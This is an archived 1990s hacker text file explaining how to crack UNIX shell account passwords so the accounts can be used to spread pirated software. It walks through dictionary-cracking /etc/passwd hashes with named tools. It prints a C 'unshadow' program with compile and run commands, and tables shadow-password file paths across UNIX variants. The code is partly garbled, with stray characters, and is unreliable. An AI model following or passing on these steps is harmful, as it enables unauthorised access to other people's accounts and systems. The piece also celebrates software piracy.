TUCoPS :: Password Security :: unixpw.txt

Cracking that passwd file!

+----------------------------------------------------------------------------+
¦    Author(s): ¦ Krypto                                                     ¦
+---------------+------------------------------------------------------------¦
¦      Subject: ¦ Cracking that "Passwd" File                                ¦
+----------------------------------------------------------------------------+
______________________________________________________________________________
______________________________________________________________________________
+----------------------------------------------------------------------------+
¦       R  E  A  L  I  T  Y     C  H  E  C  K     N  E  T  W  O  R  K!       ¦
+----------------------------------------------------------------------------¦
¦____________________________________________________________________________¦
¦____________________________________________________________________________¦
+----------------------------------------------------------------------------¦
¦                                                                            ¦
¦      I'm not an amazing "3l33t3" hacker, but I have picked up some things  ¦
¦  over the course of my scene life.                                         ¦
¦                                                                            ¦
¦      At times, many of us are without Internet shell account, therefore    ¦
¦  inhibiting our ablility to spread the warez.  Many of us seek to remedy   ¦
¦  this by cracking Internet shell accounts and doing as we please with      ¦
¦  them, mainly spreading.  Here, I'll show you the basic process in         ¦
¦  cracking UNIX accounts so that you can better your efforts in spreading   ¦
¦  them warez.                                                               ¦
¦                                                                            ¦
¦      Most Internet shells are UNIX based and therefore store the password  ¦
¦  to all the users in a file called the "passwd" file.  This is usually     ¦
¦  located at /etc/passwd.  The basic structure of the passwd file contains  ¦
¦  lines looking like this:                                                  ¦
¦                                                                            ¦
¦      bgates:VKa0XuF8KB4sc:5604:12:William Gates:/home/bgates:/bin/bash     ¦
¦                                                                            ¦
¦      Essentially, the line is broken down into these parts:                ¦
¦                                                                            ¦
¦  Username: bgates                                                          ¦
¦  Encrypted Password: VKa0XuF8KB4sc                                         ¦
¦  User number: 5604                                                         ¦
¦  Group Number: 12                                                          ¦
¦  Real Name (usually): William Gates                                        ¦
¦  Home Directory: /home/bgates                                              ¦
¦  Type of Shell: /bin/bash                                                  ¦
¦                                                                            ¦
¦      Your main concern is to crack each encrypted password for every       ¦
¦  user.  Because the encryption function is only unidirectional, you        ¦
¦  cannot decrypt the encrypted password.  You must run a cracking program   ¦
¦  which encrypts words then compares the encrypted word with the password.  ¦
¦  If they match you now have cracked the password.                          ¦
¦                                                                            ¦
¦      Because cracking relies on words that are encrypted, you MUST have a  ¦
¦  wordlist.  For beginners, a basic wordlist can be found as a dictionary   ¦
¦  file supplied as a part of UNIX.  The more the comprehensive the          ¦
¦  wordlist is, the better your chances of successfully cracking passwords.  ¦
¦  Next, you'll need a passwd cracker, which comes under numerous versions   ¦
¦  depending on your operating system.  Currently the best are:              ¦
¦                                                                            ¦
¦  Software            Operating System                                      ¦
¦  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                      ¦
¦  CrackerJack v1.4    DOS                                                   ¦
¦  Crack               UNIX                                                  ¦
¦                                                                            ¦
¦      Run the "cracking" program and feed your wordlist and passwd file     ¦
¦  into the program.  And watch as it "cracks" the passwords.                ¦
¦                                                                            ¦
¦      Sometimes you'll discover that the passwd file is incomplete or       ¦
¦  looks something like this:                                                ¦
¦                                                                            ¦
¦      bgates:*:5604:12:William Gates:/home/bgates:/bin/bash                 ¦
¦                                                                            ¦
¦      The * is called the token and means that the passwd file has been     ¦
¦  shadowed.  Password shadowing is a security system where the encrypted    ¦
¦  password field of /etc/passwd is replaced with a special token and the    ¦
¦  encrypted password is stored in a separate file which is not readable by  ¦
¦  normal system users.                                                      ¦
¦                                                                            ¦
¦      In order to defeat this, you'll need to write a C program and         ¦
¦  compile it similar to this:                                               ¦
¦                                                                            ¦
¦      Cut out the program at the bottom and save as "shadow.c"              ¦
¦                                                                            ¦
¦      Run "gcc shadow.c -o shadow" or "cc shadow.c -o shadow"               ¦
¦                                                                            ¦
¦      Run "./shadowpw >> password"                                          ¦
¦                                                                            ¦
¦      "password" should be your deshadowed password list.                   ¦
¦                                                                            ¦
¦      If you have any problems, or need any help whatsoever... DO NOT       ¦
¦  CONTACT ME!                                                               ¦
¦                                                                            ¦
+----------------------------------------------------------------------------¦
¦                                                                            ¦
¦  Sample Unshadow Program                                                   ¦
¦  ~~~~~~~~~~~~~~~~~~~~~~~                                                   ¦
¦                                                                            ¦
¦   struct  SHADOWPW {     /* see getpwent(3) */                             ¦
¦     char *pw_name;                                                         ¦
¦     char *pw_passwd;                                                       ¦
¦     int  pw_uid;                                                           ¦
¦     int  pw_gid;                                                           ¦
¦     int  pw_quota;                                                         ¦
¦     char *pw_comment;                                                      ¦
¦     char *pw_gecos;                                                        ¦
¦     char *pw_dir;                                                          ¦
¦     char *pw_shell;                                                        ¦
¦   };                                                                       ¦
¦   struct passwd *getpwent(), *getpwuid(), *getpwnam();                     ¦
¦                                                                            ¦
¦   #ifdef   elxsis?                                                         ¦
¦                                                                            ¦
¦   /* Name of the shadow password file. Contains password and aging info *  ¦
¦                                                                            ¦
¦   #define  SHADOWPW "/etc/shadowpw"                                        ¦
¦   #define  SHADOWPW_PAG "/etc/shadowpw.pag"                                ¦
¦   #define  SHADOWPW_DIR "/etc/shadowpw.dir"                                ¦
¦   /*                                                                       ¦
¦    *  Shadow password file pwd->pw_gecos field contains:                   ¦
¦    *                                                                       ¦
¦    *  <type>,<period>,<last_time>,<old_time>,<old_password>                ¦
¦    *                                                                       ¦
¦    *  <type>  = Type of password criteria to enforce (type int).           ¦
¦    *  BSD_CRIT (0), normal BSD.                                            ¦
¦    *  STR_CRIT (1), strong passwords.                                      ¦
¦    *  <period>  = Password aging period (type long).                       ¦
¦    *  0, no aging.                                                         ¦
¦    *  else, number of seconds in aging period.                             ¦
¦    *  <last_time>	 = Time (seconds from epoch) of the last password        ¦
¦    *  change (type long).                                                  ¦
¦    *  0, never changed.n                                                   ¦
¦    *  <old_time>  = Time (seconds from epoch) that the current password    ¦
¦    *  was made the <old_password> (type long).                             ¦
¦    *  0, never changed.ewromsinm                                           ¦
¦    *  <old_password> = Password (encrypted) saved for an aging <period> t  ¦
¦    *  prevent reuse during that period (type char [20]).                   ¦
¦    *  "*******", no <old_password>.                                        ¦
¦    */                                                                      ¦
¦                                                                            ¦
¦   /* number of tries to change an aged password */                         ¦
¦                                                                            ¦
¦   #define  CHANGE_TRIES 3                                                  ¦
¦                                                                            ¦
¦   /* program to execute to change passwords */                             ¦
¦                                                                            ¦
¦   #define  PASSWD_PROG "/bin/passwd"                                       ¦
¦                                                                            ¦
¦   /* Name of the password aging exempt user names and max number of entir  ¦
¦                                                                            ¦
¦   #define  EXEMPTPW "/etc/exemptpw"                                        ¦
¦   #define MAX_EXEMPT 100                                                   ¦
¦                                                                            ¦
¦                                                                            ¦
¦   /* Password criteria to enforce */                                       ¦
¦                                                                            ¦
¦   #define BSD_CRIT 0 /* Normal BSD password criteria */                    ¦
¦   #define STR_CRIT 1  /* Strong password criteria */                       ¦
¦   #define MAX_CRIT 1                                                       ¦
¦   #endif   elxsi                                                           ¦
¦   #define NULL 0                                                           ¦
¦   main()                                                                   ¦
¦   {                                                                        ¦
¦   struct passwd *p;                                                        ¦
¦   int i;                                                                   ¦
¦   for (;1;) {;                                                             ¦
¦     p=getpwent();                                                          ¦
¦     if (p==NULL) return;                                                   ¦
¦     printpw(p);                                                            ¦
¦   }                                                                        ¦
¦   }                                                                        ¦
¦                                                                            ¦
¦   printpw(a)                                                               ¦
¦   struct SHADOWPW *a;                                                      ¦
¦   {                                                                        ¦
¦   printf("%s:%s:%d:%d:%s:%s:%s\n",                                         ¦
¦      a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,                          ¦
¦      a->pw_gecos,a->pw_dir,a->pw_shell);                                   ¦
¦   }                                                                        ¦
¦                                                                            ¦
¦   /* SunOS 5.0  /etc/shadow */                                             ¦
¦   /* SunOS4.1+c2     /etc/security/passwd.adjunct */                       ¦
¦                                                                            ¦
+----------------------------------------------------------------------------¦
¦                                                                            ¦
¦      The passwd file is located in the following pathes for each system.   ¦
¦  To determine your UNIX system type, enter the following during the UNIX   ¦
¦  prompt:                                                                   ¦
¦                                                                            ¦
¦      uname -a                                                              ¦
¦                                                                            ¦
¦  UNIX Paths (Courtesy of 2600)                                             ¦
¦                                                                            ¦
¦  UNIX                  Path                            Token               ¦
¦  -----------------------------------------------------------------         ¦
¦  AIX 3                 /etc/security/passwd            !                   ¦
¦         or             /tcb/auth/files/<first letter   #                   ¦
¦                              of username>/<username>                       ¦
¦  A/UX 3.0s             /tcb/files/auth/?/*                                 ¦
¦  BSD4.3-Reno           /etc/master.passwd              *                   ¦
¦  ConvexOS 10           /etc/shadpw                     *                   ¦
¦  ConvexOS 11           /etc/shadow                     *                   ¦
¦  DG/UX                 /etc/tcb/aa/user/               *                   ¦
¦  EP/IX                 /etc/shadow                     x                   ¦
¦  HP-UX                 /.secure/etc/passwd             *                   ¦
¦  IRIX 5                /etc/shadow                     x                   ¦
¦  Linux 1.1             /etc/shadow                     *                   ¦
¦  OSF/1                 /etc/passwd[.dir|.pag]          *                   ¦
¦  SCO Unix #.2.x        /tcb/auth/files/<first letter   *                   ¦
¦                               of username>/<username>                      ¦
¦  SunOS4.1+c2           /etc/security/passwd.adjunct    ##username          ¦
¦  SunOS 5.0             /etc/shadow                                         ¦
¦                        <optional NIS+ private secure maps/tables/whatever  ¦
¦  System V Release 4.0  /etc/shadow                     x                   ¦
¦  System V Release 4.2  /etc/security/* database                            ¦
¦  Ultrix 4              /etc/auth[.dir|.pag]            *                   ¦
¦  UNICOS                /etc/udb                        *                   ¦
¦                                                                            ¦
¦      Well secure systems with shadowed passwords will cause a              ¦
¦  segmentation fault once you've run that sample program.  Remember, don't  ¦
¦  come bugging me on IRC if your little hacking escapade doesn't turn out   ¦
¦  like you wanted it to.  Well, that's all for now, enjoy your newly        ¦
¦  hacked UNIX accounts and spread them warez.                               ¦
¦                                                                            ¦
+----------------------------------------------------------------------------¦

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH